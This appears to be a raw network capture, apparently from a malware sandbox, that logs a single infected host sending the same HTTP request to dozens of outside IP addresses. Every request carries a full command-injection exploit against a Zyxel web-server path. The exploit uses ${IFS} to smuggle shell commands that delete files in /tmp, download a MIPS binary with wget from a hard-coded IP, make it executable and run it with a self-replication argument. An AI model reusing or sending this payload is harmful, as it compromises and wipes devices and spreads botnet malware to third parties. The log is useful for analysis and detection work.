                                        Mar 31, 2024 09:20:16.079823971 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        185192.168.2.2342946190.26.44.232443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.079858065 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        186192.168.2.236003446.123.174.40443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.079900980 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        187192.168.2.234662053.57.89.205443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.079986095 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        188192.168.2.2337658105.6.18.205443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.080018044 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        189192.168.2.2337870171.53.71.181443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.080029011 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        190192.168.2.2347218137.143.179.117443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.080085993 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        191192.168.2.235650895.16.138.142443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.080151081 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        192192.168.2.2333626182.166.208.77443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.080189943 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        193192.168.2.2357180148.72.156.233443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.080234051 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        194192.168.2.2346712125.181.35.28443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.080280066 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        195192.168.2.2343382157.138.69.187443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.080323935 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        196192.168.2.2333236119.216.252.117443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.080365896 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        197192.168.2.2353026139.174.55.87443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.080423117 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        198192.168.2.233744864.206.2.41443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.080473900 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        199192.168.2.233453092.234.38.55443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.080518961 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        200192.168.2.235496274.249.84.220443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.080559969 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        201192.168.2.2346452197.74.103.113443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.080599070 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        202192.168.2.235187687.216.96.86443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.080630064 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        203192.168.2.233766073.120.6.197443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.080688000 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        204192.168.2.2336610139.92.49.200443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.080718994 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        205192.168.2.2351826120.195.211.14443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.080781937 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        206192.168.2.234802645.41.108.71443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.080821991 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        207192.168.2.233743295.153.31.86443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.080868959 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        208192.168.2.2344378118.167.251.36443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.080904961 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        209192.168.2.235858692.182.155.232443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.080941916 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        210192.168.2.233966467.254.187.241443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.080992937 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        211192.168.2.2333858171.179.172.39443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.081043005 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        212192.168.2.2337010146.123.42.46443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.081113100 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        213192.168.2.2345522185.21.167.16443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.081152916 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        214192.168.2.2356418123.74.217.242443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.081204891 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        215192.168.2.235321291.124.167.204443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.081280947 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        216192.168.2.2341680221.146.240.17443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.081315994 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        217192.168.2.2340042174.170.207.232443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.081347942 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        218192.168.2.2358668220.198.250.52443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.081387997 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        219192.168.2.2357166120.120.112.32443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.081442118 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        220192.168.2.233493691.136.201.205443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.081526041 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        221192.168.2.233352019.17.51.86443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.081561089 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        222192.168.2.235226049.1.104.50443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.081610918 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        223192.168.2.2355488170.71.204.132443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.081662893 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        224192.168.2.234064698.102.156.72443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.081701040 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        225192.168.2.234416282.212.12.119443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.081758976 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        226192.168.2.233303861.112.38.90443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.081789017 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        227192.168.2.2344876193.253.160.89443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.081825972 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        228192.168.2.2340492195.112.252.213443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.081864119 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        229192.168.2.235485812.240.125.14443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.081907988 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        230192.168.2.2333098129.194.184.224443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.081958055 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        231192.168.2.233373884.123.50.55443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.082007885 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        232192.168.2.2334798155.218.107.97443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.082034111 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        233192.168.2.2340344160.215.207.99443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.082108974 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        234192.168.2.2334912128.247.69.22443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.082149029 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        235192.168.2.233994467.170.2.137443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.082204103 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        236192.168.2.233850893.221.232.233443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.082242966 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        237192.168.2.235674459.40.151.211443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.082274914 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        238192.168.2.2341816121.117.117.253443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.082307100 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        239192.168.2.2335526107.95.88.176443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.082355976 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        240192.168.2.233288080.24.112.249443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.082401037 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        241192.168.2.2339360156.5.242.6443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.082432032 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        242192.168.2.2334060104.231.161.114443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.082480907 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        243192.168.2.234854871.11.3.240443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.082532883 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        244192.168.2.235785223.74.73.80443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.082587957 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        245192.168.2.233462080.11.65.161443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.082627058 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        246192.168.2.2354834193.255.52.51443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.082684040 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        247192.168.2.2354328116.153.196.14443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.082761049 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        248192.168.2.235395894.211.193.166443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.082793951 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        249192.168.2.234325017.241.113.197443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.082840919 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        250192.168.2.2352170208.45.218.215443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.082875013 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        251192.168.2.2353688135.234.109.121443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.082912922 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        252192.168.2.235545250.33.25.85443
                                        TimestampBytes transferredDirectionData
